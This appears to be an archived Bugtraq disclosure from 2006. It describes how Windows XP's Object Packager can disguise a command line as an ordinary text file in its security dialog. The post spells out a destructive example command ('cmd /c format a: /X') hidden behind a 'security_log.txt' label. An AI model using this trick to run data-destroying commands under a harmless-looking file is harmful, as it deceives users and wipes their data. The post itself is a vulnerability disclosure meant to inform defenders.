Spoofing security dialog in object packager - 2

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Spoofing security dialog in object packager - 2
From: seejay.11@xxxxxxxxx
Date: 14 Oct 2006 19:34:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

A few months ago, I found that in all versions of windows xp are vulnerable: In 
object packager, if one created a command line, eg "format a: /X" and wanted to 
hide it, leave the icon and label to anything, really, and change the command 
line to 'cmd /c format a: /X > ..\security_log.txt'. It will appear as 
"security_log.txt" in the dialog, and will have the same icon, mime type, 
description, etc, as a normal text file, but if you were to open it, it would 
pipe the results of "format a: /X" to something that is probably called 
"C:\docume~1\%username%\security_log.txt".

Prev by Date: Jinzora 2.6 - Remote File Include Vulnerabilities
Next by Date: Re: yet another OpenSSH timing leak?
Previous by thread: Jinzora 2.6 - Remote File Include Vulnerabilities
Next by thread: ISS BlackICE PC Protection Filelock protection bypass Vulnerability
Index(es):
- Date
- Thread